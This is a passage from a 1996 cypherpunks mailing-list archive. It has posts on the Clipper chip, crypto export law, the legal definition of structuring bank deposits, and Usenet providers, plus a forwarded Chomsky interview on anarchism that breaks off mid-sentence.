Equipment... Where to get the best deals... 
Who the players are...

To join the "Surveillance List" please send an E-Mail with the words
"Surveillance List" in the "subject" field. Please include you name and
e-mail address in the body of message... with a little background info...

We urge subscribers to "Get Involved" and make this list a viable forum
for the exchange of information and ideas... Don't be a LURKER... If you've 
got a question, ask it... (there is no such thing as a dumb question...)
If you've got info to share, share it... 

**************************************************************************
List Postings to: 6886@mne.net
**************************************************************************
Subscribe to: 6886@mne.net
In the subject field type: subscribe-surveillance list 
**************************************************************************
Unsubscribe to: 6886@mne.net
In the subject field type: unsubscribe-surveillance list  
**************************************************************************
...The Simple Rules of the Surveillance List...

The Surveillance List Owners may Reject or Edit any posts that are:

1.) Unrelated to Eavesdropping, Surveillance or Privacy technology... 
2.) Flames or Negative posts... 
3.) E-Signatures that are considered excessive... 
4.) Advertisements not directly related to the list topics...
5.) Attached Files...
6.) Oversized Posts...

****************************************************************************
This publication is copyrighted and is protected by U.S. and 
International copyright law. The information transmitted on this 
list may not be reproduced, reposted or forwarded to any non-list 
member without expressed written permission of the List Owner.
Violation of U.S. copyright law is a criminal and civil offense...
****************************************************************************   
The Surveillance List is moderated by SpyKing@thecodex.com
Copyright 1996, Codex Publishing Inc., All Rights Reserved...
****************************************************************************




*************************************************************************
The Codex Surveillance & Privacy News - http://www.thecodex.com

Home of the most comprehensive compilation of search & tools 
On the Net - Over 6000 FREE searches...

"We don't spy on you... but we DO keep an eye on those that do..."
*************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Dec 1996 21:28:28 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: clipper plans 4 sale
Message-ID: <199612250528.VAA26570@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:18 PM 12/24/96 -0500, Adam Shostack wrote:

>	Many people will believe it.  Its easy to construct the case
>that the ITARs, as they apply to things in the public domain, thing
>implemented outside the US, things designed outside the US, are just
>silly.  Its much harder to make that argument about Skipjack,
>especially as you can't legally export the chips.

When Clipper was first proposed, in April of 1993, as I recall one of the 
government-types promoting it claimed that it would be exportable "except to 
terrorist-sponsoring countries like Libya."

This made me laugh:  It seemed to me that if Clipper codes were kept and 
available to the US government, you'd expect that they'd WANT Libya to get 
those phones!  In fact, they'd air-drop them in the thousands, right?  After 
all, this would make other countries more dependant on the US for 
cooperation, and they'd be more pliable as a result, right?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Dec 1996 21:28:32 -0800 (PST)
To: Marc Horowitz <gbroiles@netbox.com>
Subject: Re: Reflections on the Bernstein ruling
Message-ID: <199612250528.VAA26575@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 12/23/96 -0500, Marc Horowitz wrote:
>Greg Broiles <gbroiles@netbox.com> writes:

>>> It's also unclear that Judge Patel's ruling is enough to make export of
>>> crypto source legal by people/organizations located even in the Northern
>>> District of CA. Venue is proper, in an ITAR case, in any jurisdiction which
>>> the defense articles have moved through. (18 USC 3237(a); _US v. Durrani_
>>> 659 F.Supp 1177, 1182 (D. Conn, 1987); an easy analogy is to the _US v.
>>> Thomas_ "Amateur Action" case, where Tennessee venue was proper for
>>> prosecution of California defendants who sent porn into Tennessee.) So it's
>>> at least arguable that the feds could simply bring an ITAR prosecution in
>>> another district, if exported crypto flowed through that district. (But I
>>> don't think they can do so against Dan Bernstein because of "res judicata",
>>> a doctrine which says that once two parties have fully litigated an issue,
>>> they cannot come back to the same court - or a different one - and ask to
>>> relitigate the same issue.) 
>
>It happens to be the case that the Northern District of California
>borders on the Pacific Ocean, and includes (at least) two airports
>with direct flights to more crypto-friendly jurisdictions to the west.
>I do not know if there are any satellite or oceanic cables similarly
>situated, but I wouldn't be surprised.

In law, there's a concept known as "mens rea," or "guilty mind."  (A Real 
Lawyer (tm) should be able to explain this to CP)    Presumably, if the 
legal system followed its own rules, it would be impossible to have a 
"guilty mind" about exporting crypto subsequent to the Patel ruling, until 
such time as that ruling was specifically overturned.  After all, the lay 
public is not expected to be experts here, and if a judge (!) says that 
crypto export regulations are a violation of the US Constitution, we should 
be entitled to believe her and to believe that we're entitled to disobey the 
(unconstitutional) law with a clear conscience.

Further, IMO, It shouldn't even matter if contrary legal decisions exist, as long as 
they are not directly above that court so as to overrule Judge Patel. Our 
consciences can still be clear:  If courts can't, themselves, agree, 
presumably we aren't obligated to second-guess which one is correct and 
which one is not.

However, a REAL LAWYER would also have to tell you that the system doesn't 
obey its own rules!
 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Dec 1996 21:47:27 -0800 (PST)
To: "Brian A. LaMacchia" <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <199612250547.VAA27540@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 AM 12/25/96 -0500, Brian A. LaMacchia wrote:
>At 07:17 PM 12/24/96 -0800, jim bell wrote:
>>At 09:39 PM 12/24/96 -0500, Brian A. LaMacchia wrote:
>>>Why, of course, the fact that the guy attempted to structure the
>>>transaction to evade the reporting requirements in the first place.  31
>>>U.S.C. 5324(a). 
>>
>>Who says?  He eventually reported it within the legally-defined time.  The 
>>evidence of intent to COMPLY with the law is far stronger than the evidence 
>>of the opposite.  
>
>Bzzt, wrong answer, thanks for playing.  "Reporting" here doesn't mean
>"report the income to the IRS on your tax return."  It refers to the report
>the bank is required to file by law on every transaction in excess of
>$10,000.


Bzzt, wrong answer!  By definition, if the report was filed as a consequence of the transaction, then the transaction was reported IN FACT and the person didn't evade it!   (whether he wanted to evade it is, of course, pure speculation on your part.  It is, obviously, questionable whether the government can make a person's mere _desires_ criminal.)

Let's suppose, hypothetically, that there is a rule which states "If anybody comes in and does three separate $9,000 transactions, they get reported."  In that case, anybody who does those transactions is already aware that doing them does NOT "evade the reporting requirements."

Okay, maybe no such explicit rule exists.  However, can you prove that anyone really believes that he is "evading reporting requirements"?  Having read of this incident, it is quite obvious that the government doesn't obey its own rules and doesn't limit itself to logic and reasonable positions. It is also obvious that banks can't be trusted to follow reliable rules.   Once aware of this, how can you show that a person really thought he was getting away with anything?  (which is, after all, an essential element of the crime of "structuring", I suppose.)

Gotcha!  Catch-22 situation.  




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Tue, 24 Dec 1996 18:39:42 -0800 (PST)
To: jim bell <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <3.0.32.19961224213904.0073acc0@martigny.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 05:54 PM 12/24/96 -0800, jim bell wrote:
>"Man wins $27,000.  He will eventually be required to report and pay taxes 
>on the amount, but not quite yet.  Stupid I/R/S people alert him BEFORE he 
>files his taxes.  He reports the payment, as is ostensibly legally required. 
> He paid the taxes owed.  Period."
>
>THEN you said, "we settled the matter."   Huh?  What, exactly, was there to 
>"settle"?  

Why, of course, the fact that the guy attempted to structure the
transaction to evade the reporting requirements in the first place.  31
U.S.C. 5324(a).  Structuring (or attempting to structure) a financial
transaction to evade the reporting requirements is a violation of this
subsection, and 31 U.S.C. 5322(a) says that a willful violation is a
five-year felony.  Oh, and willful violation while violating another U.S.
law is a ten-year felony until 5322(b).  I'd suspect the guy was looking at
a 5322(b) charge (with "transmission of wagering information in interstate
commerce" as the "other U.S. law" being violated), but IANAL and I don't
know the case law.

EBD: Please correct me if I'm wrong.  Oh, and did you go after the guy who
wrote the three $9K checks for conspiracy or aiding-and-abetting?

					--bal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Caputo <ccaputo@alt.net>
Date: Tue, 24 Dec 1996 22:04:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [Fwd: usenet censorship]
In-Reply-To: <32e664c7.81338663@smtp.best.com>
Message-ID: <Pine.BSI.3.93.961224215834.12340g-100000@baklava.alt.net>
MIME-Version: 1.0
Content-Type: text/plain


We mean that we are coming up with a new pricing scheme that will allow us
to more accurately match revenue with expenses.

Chris Caputo
President, Altopia Corporation

On Tue, 24 Dec 1996, J Durbin wrote:
> What exactly does F-K mailing list contributor and alt.net admin Chris
> Caputo mean by "refine our offerings"?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slothrop@poisson.com (J Durbin)
Date: Tue, 24 Dec 1996 15:26:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [Fwd: usenet censorship]
In-Reply-To: <5HJgZD76w165w@bwalk.dm.com>
Message-ID: <32e664c7.81338663@smtp.best.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 96 15:16:27 EST, Dimitri Vulis (dlv@bwalk.dm.com)
wrote:

>> Does anyone know of a server that allows uncensored news groups, mine
>> censors all alt. groups.
>
>Check out alt.net.

From http://www.alt.net :

Altopia Corporation "We do news." 

Altopia Corporation provides Usenet news and email services to
individuals and organizations. At this time we are not taking 
any more customers until we have had a chance to refine our 
offerings. Please check back at this site periodically for 
details of future offerings. 

If you have any questions, please send email to info@alt.net. 

Last Modified: 961213 
-----------------------

What exactly does F-K mailing list contributor and alt.net admin Chris
Caputo mean by "refine our offerings"?

jd
-- 
Fight spam: http://www.vix.com/spam

jason durbin
slothrop@poisson.com
Stop Reading Here <---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slothrop@poisson.com (J Durbin)
Date: Tue, 24 Dec 1996 15:37:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <199612242019.MAA18186@netcom18.netcom.com>
Message-ID: <32e76742.81973946@smtp.best.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 96 12:19:22 -0800, you wrote:

>>You obviously (deliberately?) are misrepresenting May's comment above.  It 
>>isn't that some kinds of evil are "no big deal":  It's that quantiatively, 
>>refusing to accept a solution that would prevent, say, 100 deaths, simply 
>>because it would cause _one_ DIFFERENT death is foolish and misguided.  
>>
>>If you feel inclined to deny this, consider the reverse situation:  Would 
>>you approve of the saving of one life if it cost 100 lives?  (all things 
>>being equal.)  While most people would feel uncomfortable being asked to 
>>make decisions of this kind, that does not mean that one outcome is not 
>>identifiably better than another.  
>
>*I* am misrepresenting Timmy's statement?
>please explain to me how anonymous extortion and kidnapping/ransom (what
>Timmy was talking about) saves lives along the lines of the above 
>reasoning...

{netcom18:1} last vznuri
vznuri    ttyp7    den-co-pm15.netc Tue Dec 24 12:15 - 13:24  (01:09)
vznuri    ttyp4    den-co-pm6.netco Fri Dec 20 16:10 - 16:11  (00:00)

Nu, what is Nuri's relationship to Colin james III and Dimi Vulis,
both of whom have implicated their adversaries with an italian porno
site?

jd
-- 
Fight spam: http://www.vix.com/spam

jason durbin
slothrop@poisson.com
Stop Reading Here <---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slothrop@poisson.com (J Durbin)
Date: Tue, 24 Dec 1996 15:37:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: clipper plans 4 sale (was Re: Earl Edwin Pitts, $224,000)
In-Reply-To: <199612242026.MAA18998@netcom18.netcom.com>
Message-ID: <32e868b5.82344652@smtp.best.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 96 12:26:02 -0800, vladimir z nuri wrote:

>CYPHERPUNKS-- this would be another big front page NYT article and
>*severe* blow to the spook establishment if someone PUBLISHED this
>algorithm in cyberspace.... just noting the obvious and not
>encouraging anything ILLEGAL here, heh heh, <wink>

What do you think about Eiffel?

jd
-- 
Fight spam: http://www.vix.com/spam

jason durbin
slothrop@poisson.com
Stop Reading Here <---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Tue, 24 Dec 1996 21:12:44 -0800 (PST)
To: jim bell <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <3.0.32.19961225001207.00cde89c@martigny.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:17 PM 12/24/96 -0800, jim bell wrote:
>At 09:39 PM 12/24/96 -0500, Brian A. LaMacchia wrote:
>>Why, of course, the fact that the guy attempted to structure the
>>transaction to evade the reporting requirements in the first place.  31
>>U.S.C. 5324(a). 
>
>Who says?  He eventually reported it within the legally-defined time.  The 
>evidence of intent to COMPLY with the law is far stronger than the evidence 
>of the opposite.  

Bzzt, wrong answer, thanks for playing.  "Reporting" here doesn't mean
"report the income to the IRS on your tax return."  It refers to the report
the bank is required to file by law on every transaction in excess of
$10,000.  If the guy didn't report the $27K as gambling winnings on his
1040 then he'd be guilty of tax evasion in addition to the structuring
charges, but that's an independent issue.  Go read 31 U.S.C. 5324
(http://www.law.cornell.edu/uscode/).

>Again, he clearly DID NOT "evade the reporting requirement."  Brian Davis 
>admitted this. (Whether he ever intended to do this is sheer speculation on 
>the part of anyone else.  We'll never know; as Davis pointed out, the IRS 
>screwed up.)   Even if the standard of evidence was as low as "preponderance 
>of evidence" (which it, of course, is not in a criminal case) he SHOULD have 
>won.  By waiting until the return was filed and the tax was paid, the IRS 
>was allowing him to resolve whatever ambiguity remained.

Of course he attempted to evade: three checks, deposits the first in bank
1, the second in bank 2, and the third in bank 1 again.  Trying to not
cause either bank to file the form that says "we just got a deposit in
excess of $10K."  That's structuring to evade.  Welcome to Allenwood.

					--bal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Wed, 25 Dec 1996 00:10:54 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: MerryMerry, and All That
Message-ID: <01BBF1F8.817F2F00@king1-26.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



                                        {}
                                        |||| 
                                      *(X)*
                                      `'*(X)*                                
                                     `~'~*(X)*                              
                                   `'x'~'x'~*(X)*                 
                               (X)'*x~`x`~`x`~x\                    
                           /x'~'*(X)'*x`~`x`~`x`~x\                     
                  ((O'^'^'^'^'^M*(X)e'R"r%y^^'^'^'^'^O))               
          *(((^^^^'~'C\h"r,i%s*(X)'T*m&aS'~'~'^^^^^)))*          
    {((<^^^^^^^^="c*y^P+h'eR*(X)*Pu#n`K"s^^^^^^^^^^^>))}
         *(((^^^'&"T"i`m$m^Y_&_*(X)*L.D,+T'oo!^^^)))*       
                 ((O'~'~'~'~'~'~'~'~'~'*(X)*'~'~'~'O))            
                        `'`'*(X)*"~"x"~"x"~"x*(X)*'``                      
                           `'`'*(X)*"x"~"x"~"x"~"``
                                ``*(X)*"x"~"x"~"``                       
                                   ``*(X)*x"x~"``      
                                       `*(X)*x"``                            
                                           *(X)*                    
                                            *|||*                                                 
                                             "^"
                                              V        

   ..
Blanc               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Tue, 24 Dec 1996 22:57:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards? (fwd)
Message-ID: <m0vcnHA-0003BPC@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Mon, 23 Dec 1996 11:14:00 -0500 (EST)
> From: Michael Gurski <mgursk1@umbc.edu>
> Subject: Re: Legality of requiring credit cards? (fwd)
> 
> Yes, and if I'd *ever* written a bad check, it would be a different
> story.  The weasel there basically said that because I'd made
> purchases there in the past few days, they tried to contact my bank on
> a Sunday afternoon....  (No, I don't get it either)
> 
> But that still doesn't answer whether or not a credit card can be
> requested when paying by check.
> 

They can do whatever the hell they want. 

Whether it makes any difference to the store's bottom line is 
another question. What some places will do is call the card number
down to the credit offices, who will run an authorization (*not a
charge) for one dollar on that card number, figuring that if the
Visa/MC system won't even authorize a dollar, they'd better not
take the check. Personally, I don't think the process helps much.
It's all a part of Corporate Cover-Your-Own-Ass Culture. "Yes, the
check bounced, but we followed the procedures in the employee
manual!" "We're committed to taking definite steps to fight shrinkage!"

People on the list could probably come up with much better ways to
authenticate a reputation. Until then, for personal checks, you can
call any bank in the U.S., ask for bookkeeping, and ask them if there
are funds in the bank to cover the check you're holding. Any bank
should give you a yes or no on this. Some banks, like the First Banks
here in Minnesota, will do this through their automated telephone
banking services, 24 hours.

Now, for the rest of you who are calling for the government, of all
people, to protect your privacy, please......take that personal 
check, picture ID and MasterCard, go down to the after-Christmas
sales, and buy a clue.

--CG






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Tue, 24 Dec 1996 22:32:02 -0800 (PST)
To: jim bell <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <3.0.32.19961225013128.00cfb688@martigny.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 09:35 PM 12/24/96 -0800, jim bell wrote:
>At 12:12 AM 12/25/96 -0500, Brian A. LaMacchia wrote:
>>Bzzt, wrong answer, thanks for playing.  "Reporting" here doesn't mean
>>"report the income to the IRS on your tax return."  It refers to the report
>>the bank is required to file by law on every transaction in excess of
>>$10,000.
>
>Bzzt, wrong answer!  By definition, if the report was filed as a
consequence of >the transaction, then the transaction was reported IN FACT
and the person didn't >evade it!   (whether he wanted to evade it is, of
course, pure speculation on your >part.  It is, obviously, questionable
whether the government can make a person's >mere _desires_ criminal.)

Please, Jim, *go read the law*.  Do it now, before you even think about
replying to this message, else you'll say something else stupid and
irrelevant.  Look, I'll even give you the complete, specific URL for the
section of the U.S. Code in question; all you have to do is cut-and-paste
it into your favorite Web browser:

	http://www.law.cornell.edu/uscode/31/5324.html

See in clause (1) where it says, "cause or attempt to cause a domestic
financial institution to fail to file a report required under section
5313(a)"?  See the words "attempt to cause"?  Now go back to EBD's original
post.  See where he said "Report of Suspicious Transaction"?  See the
errors in your argument above?  Good.

Your homework assignment is to go read _Ratzlaf v. US_, 510 U.S. 135, 114
S.Ct. 655, and summarize for the list.

					--bal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 24 Dec 1996 16:46:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anarcho Noel
Message-ID: <199612250041.BAA28984@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Noam Chomsky on Anarchism, Marxism & Hope for the Future

Noam Chomsky is widely known for his critique of U.S foreign policy, and
for his work as a linguist. Less well known is his ongoing support for
libertarian socialist objectives. In a special interview done for Red and
Black Revolution, Chomsky gives his views on anarchism and marxism, and the
prospects for socialism now. The interview was conducted in May 1995 by
Kevin Doyle.

RBR: First off, Noam, for quite a time now you've been an advocate for the
anarchist idea. Many people are familiar with the introduction you wrote in
1970 to Daniel Guerin's Anarchism, but more recently, for instance in the
film Manufacturing Consent, you took the opportunity to highlight again the
potential of anarchism and the anarchist idea. What is it that attracts you
to anarchism?

CHOMSKY: I was attracted to anarchism as a young teenager, as soon as I
began to think about the world beyond a pretty narrow range, and haven't
seen much reason to revise those early attitudes since. I think it only
makes sense to seek out and identify structures of authority, hierarchy,
and domination in every aspect of life, and to challenge them; unless a
justification for them can be given, they are illegitimate, and should be
dismantled, to increase the scope of human freedom. That includes political
power, ownership and management, relations among men and women, parents and
children, our control over the fate of future generations (the basic moral
imperative behind the environmental movement, in my view), and much else.
Naturally this means a challenge to the huge institutions of coercion and
control: the state, the unaccountable private tyrannies that control most
of the domestic and international economy, and so on. But not only these.
That is what I have always understood to be the essence of anarchism: the
conviction that the burden of proof has to be placed on authority, and that
it should be dismantled if that burden cannot be met. Sometimes the burden
can be met. If I'm taking a walk with my grandchildren and they dart out
into a busy street, I will use not only authority but also physical
coercion to stop them. The act should be challenged, but I think it can
readily meet the challenge. And there are other cases; life is a complex
affair, we understand very little about humans and society, and grand
pronouncements are generally more a source of harm than of benefit. But the
perspective is a valid one, I think, and can lead us quite a long way.

Beyond such generalities, we begin to look at cases, which is where the
questions of human interest and concern arise.

RBR: It's true to say that your ideas and critique are now more widely
known than ever before. It should also be said that your views are widely
respected. How do you think your support for anarchism is received in this
context? In particular, I'm interested in the response you receive from
people who are getting interested in politics for the first time and who
may, perhaps, have come across your views. Are such people surprised by
your support for anarchism? Are they interested?

CHOMSKY: The general intellectual culture, as you know, associates
'anarchism' with chaos, violence, bombs, disruption, and so on. So people
are often surprised when I speak positively of anarchism and identify
myself with leading traditions within it. But my impression is that among
the general public, the basic ideas seem reasonable when the clouds are
cleared away. Of course, when we turn to specific matters - say, the nature
of families, or how an economy would work in a society that is more free
and just - questions and controversy arise. But that is as it should be.
Physics can't really explain how water flows from the tap in your sink.
When we turn to vastly more complex questions of human significance,
understanding is very thin, and there is plenty of room for disagreement,
experimentation, both intellectual and real-life exploration of
possibilities, to help us learn more.

RBR: Perhaps, more than any other idea, anarchism has suffered from the
problem of misrepresentation. Anarchism can mean many things to many
people. Do you often find yourself having to explain what it is that you
mean by anarchism? Does the misrepresentation of anarchism bother you?

CHOMSKY: All misrepresentation is a nuisance. Much of it can be traced back
to structures of power that have an interest in preventing understanding,
for pretty obvious reasons. It's well to recall David Hume's Principles of
Government. He expressed surprise that people ever submitted to their
rulers. He concluded that since Force is always on the side of the
governed, the governors have nothing to support them but opinion. 'Tis
therefore, on opinion only that government is founded; and this maxim
extends to the most despotic and most military governments, as well as to
the most free and most popular. Hume was very astute - and incidentally,
hardly a libertarian by the standards of the day. He surely underestimates
the efficacy of force, but his observation seems to me basically correct,
and important, particularly in the more free societies, where the art of
controlling opinion is therefore far more refined. Misrepresentation and
other forms of befuddlement are a natural concomitant.

So does misrepresentation bother me? Sure, but so does rotten weather. It
will exist as long as concentrations of power engender a kind of commissar
class to defend them. Since they are usually not very bright, or are bright
enough to know that they'd better avoid the arena of fact and argument,
they'll turn to misrepresentation, vilification, and other devices that are
available to those who know that they'll be protected by the various means
available to the powerful. We should understand why all this occurs, and
unravel it as best we can. That's part of the project of liberation - of
ourselves and others, or more reasonably, of people working together to
achieve these aims.

Sounds simple-minded, and it is. But I have yet to find much commentary on
human life and society that is not simple-minded, when absurdity and
self-serving posturing are cleared away.

RBR: How about in more established left-wing circles, where one might
expect to find greater familiarity with what anarchism actually stands for?
Do you encounter any surprise here at your views and support for anarchism?

CHOMSKY: If I understand what you mean by established left-wing circles,
there is not too much surprise about my views on anarchism, because very
little is known about my views on anything. These are not the circles I
deal with. You'll rarely find a reference to anything I say or write.
That's not completely true of course. Thus in the US (but less commonly in
the UK or elsewhere), you'd find some familiarity with what I do in certain
of the more critical and independent sectors of what might be called
established left-wing circles, and I have personal friends and associates
scattered here and there. But have a look at the books and journals, and
you'll see what I mean. I don't expect what I write and say to be any more
welcome in these circles than in the faculty club or editorial board room -
again, with exceptions.

The question arises only marginally, so much so that it's hard to answer.

RBR: A number of people have noted that you use the term 'libertarian
socialist' in the same context as you use the word 'anarchism'. Do you see
these terms as essentially similar? Is anarchism a type of socialism to
you? The description has been used before that anarchism is equivalent to
socialism with freedom. Would you agree with this basic equation?

CHOMSKY: The introduction to Guerin's book that you mentioned opens with a
quote from an anarchist sympathiser a century ago, who says that anarchism
has a broad back, and endures anything. One major element has been what has
traditionally been called 'libertarian socialism'. I've tried to explain
there and elsewhere what I mean by that, stressing that it's hardly
original; I'm taking the ideas from leading figures in the anarchist
movement whom I quote, and who rather consistently describe themselves as
socialists, while harshly condemning the 'new class' of radical
intellectuals who seek to attain state power in the course of popular
struggle and to become the vicious Red bureaucracy of which Bakunin warned;
what's often called 'socialism'. I rather agree with Rudolf Rocker's
perception that these (quite central) tendencies in anarchism draw from the
best of Enlightenment and classical liberal thought, well beyond what he
described. In fact, as I've tried to show they contrast sharply with
Marxist-Leninist doctrine and practice, the 'libertarian' doctrines that
are fashionable in the US and UK particularly, and other contemporary
ideologies, all of which seem to me to reduce to advocacy of one or another
form of illegitimate authority, quite often real tyranny.

The Spanish Revolution

RBR: In the past, when you have spoken about anarchism, you have often
emphasised the example of the Spanish Revolution. For you there would seem
to be two aspects to this example. On the one hand, the experience of the
Spanish Revolution is, you say, a good example of 'anarchism in action'. On
the other, you have also stressed that the Spanish revolution is a good
example of what workers can achieve through their own efforts using
participatory democracy. Are these two aspects - anarchism in action and
participatory democracy - one and the same thing for you? Is anarchism a
philosophy for people's power?

CHOMSKY: I'm reluctant to use fancy polysyllables like philosophy to refer
to what seems ordinary common sense. And I'm also uncomfortable with
slogans. The achievements of Spanish workers and peasants, before the
revolution was crushed, were impressive in many ways. The term
'participatory democracy' is a more recent one, which developed in a
different context, but there surely are points of similarity. I'm sorry if
this seems evasive. It is, but that's because I don't think either the
concept of anarchism or of participatory democracy is clear enough to be
able to answer the question whether they are the same.

RBR: One of the main achievements of the Spanish Revolution was the degree
of grassroots democracy established. In terms of people, it is estimated
that over 3 million were involved. Rural and urban production was managed
by workers themselves. Is it a coincidence to your mind that anarchists,
known for their advocacy of individual freedom, succeeded in this area of
collective administration?

CHOMSKY: No coincidence at all. The tendencies in anarchism that I've
always found most persuasive seek a highly organised society, integrating
many different kinds of structures (workplace, community, and manifold
other forms of voluntary association), but controlled by participants, not
by those in a position to give orders (except, again, when authority can be
justified, as is sometimes the case, in specific contingencies).

Democracy

RBR: Anarchists often expend a great deal of effort at building up
grassroots democracy. Indeed they are often accused of taking democracy to
extremes. Yet, despite this, many anarchists would not readily identify
democracy as a central component of anarchist philosophy. Anarchists often
describe their politics as being about 'socialism' or being about 'the
individual'- they are less likely to say that anarchism is about democracy.
Would you agree that democratic ideas are a central feature of anarchism?

CHOMSKY: Criticism of 'democracy' among anarchists has often been criticism
of parliamentary democracy, as it has arisen within societies with deeply
repressive features. Take the US, which has been as free as any, since its
origins. American democracy was founded on the principle, stressed by James
Madison in the Constitutional Convention in 1787, that the primary function
of government is to protect the minority of the opulent from the majority.
Thus he warned that in England, the only quasi-democratic model of the day,
if the general population were allowed a say in public affairs, they would
implement agrarian reform or other atrocities, and that the American system
must be carefully crafted to avoid such crimes against the rights of
property, which must be defended (in fact, must prevail). Parliamentary
democracy within this framework does merit sharp criticism by genuine
libertarians, and I've left out many other features that are hardly subtle
- slavery, to mention just one, or the wage slavery that was bitterly
condemned by working people who had never heard of anarchism or communism
right through the 19th century, and beyond.

Leninism

RBR: The importance of grassroots democracy to any meaningful change in
society would seem to be self evident. Yet the left has been ambiguous
about this in the past. I'm speaking generally, of social democracy, but
also of Bolshevism - traditions on the left that would seem to have more in
common with elitist thinking than with strict democratic practice. Lenin,
to use a well-known example, was sceptical that workers could develop
anything more than trade union consciousness- by which, I assume, he meant
that workers could not see far beyond their immediate predicament.
Similarly, the Fabian socialist, Beatrice Webb, who was very influential in
the Labour Party in England, had the view that workers were only interested
in horse racing odds! Where does this elitism originate and what is it
doing on the left?

CHOMSKY: I'm afraid it's hard for me to answer this. If the left is
understood to include 'Bolshevism,' then I would flatly dissociate myself
from the left. Lenin was one of the greatest enemies of socialism, in my
opinion, for reasons I've discussed. The idea that workers are only
interested in horse-racing is an absurdity that cannot withstand even a
superficial look at labour history or the lively and independent working
class press that flourished in many places, including the manufacturing
towns of New England not many miles from where I'm writing - not to speak
of the inspiring record of the courageous struggles of persecuted and
oppressed people throughout history, until this very moment. Take the most
miserable corner of this hemisphere, Haiti, regarded by the European
conquerors as a paradise and the source of no small part of Europe's
wealth, now devastated, perhaps beyond recovery. In the past few years,
under conditions so miserable that few people in the rich countries can
imagine them, peasants and slum-dwellers constructed a popular democratic
movement based on grassroots organisations that surpasses just about
anything I know of elsewhere; only deeply committed commissars could fail
to collapse with ridicule when they hear the solemn pronouncements of
American intellectuals and political leaders about how the US has to teach
Haitians the lessons of democracy. Their achievements were so substantial
and frightening to the powerful that they had to be subjected to yet
another dose of vicious terror, with considerably more US support than is
publicly acknowledged, and they still have not surrendered. Are they
interested only in horse-racing?

I'd suggest some lines I've occasionally quoted from Rousseau: when I see
multitudes of entirely naked savages scorn European voluptuousness and
endure hunger, fire, the sword, and death to preserve only their
independence, I feel that it does not behoove slaves to reason about
freedom.

RBR: Speaking generally again, your own work - Deterring Democracy,
Necessary Illusions, etc. - has dealt consistently with the role and
prevalence of elitist ideas in societies such as our own. You have argued
that within 'Western' (or parliamentary) democracy there is a deep
antagonism to any real role or input from the mass of people, lest it
threaten the uneven distribution in wealth which favours the rich. Your
work is quite convincing here, but, this aside, some have been shocked by
your assertions. For instance, you compare the politics of President John
F. Kennedy with Lenin, more or less equating the two. This, I might add,
has shocked supporters of both camps! Can you elaborate a little on the
validity of the comparison?

CHOMSKY: I haven't actually equated the doctrines of the liberal
intellectuals of the Kennedy administration with Leninists, but I have
noted striking points of similarity - rather as predicted by Bakunin a
century earlier in his perceptive commentary on the new class. For example,
I quoted passages from McNamara on the need to enhance managerial control
if we are to be truly free, and about how the undermanagement that is the
real threat to democracy is an assault against reason itself. Change a few
words in these passages, and we have standard Leninist doctrine. I've
argued that the roots are rather deep, in both cases. Without further
clarification about what people find shocking, I can't comment further. The
comparisons are specific, and I think both proper and properly qualified.
If not, that's an error, and I'd be interested to be enlightened about it.

Marxism

RBR: Specifically, Leninism refers to a form of marxism that developed with
V.I. Lenin. Are you implicitly distinguishing the works of Marx from the
particular criticism you have of Lenin when you use the term 'Leninism'? Do
you see a continuity between Marx's views and Lenin's later practices?

CHOMSKY: Bakunin's warnings about the Red bureaucracy that would institute
the worst of all despotic governments were long before Lenin, and were
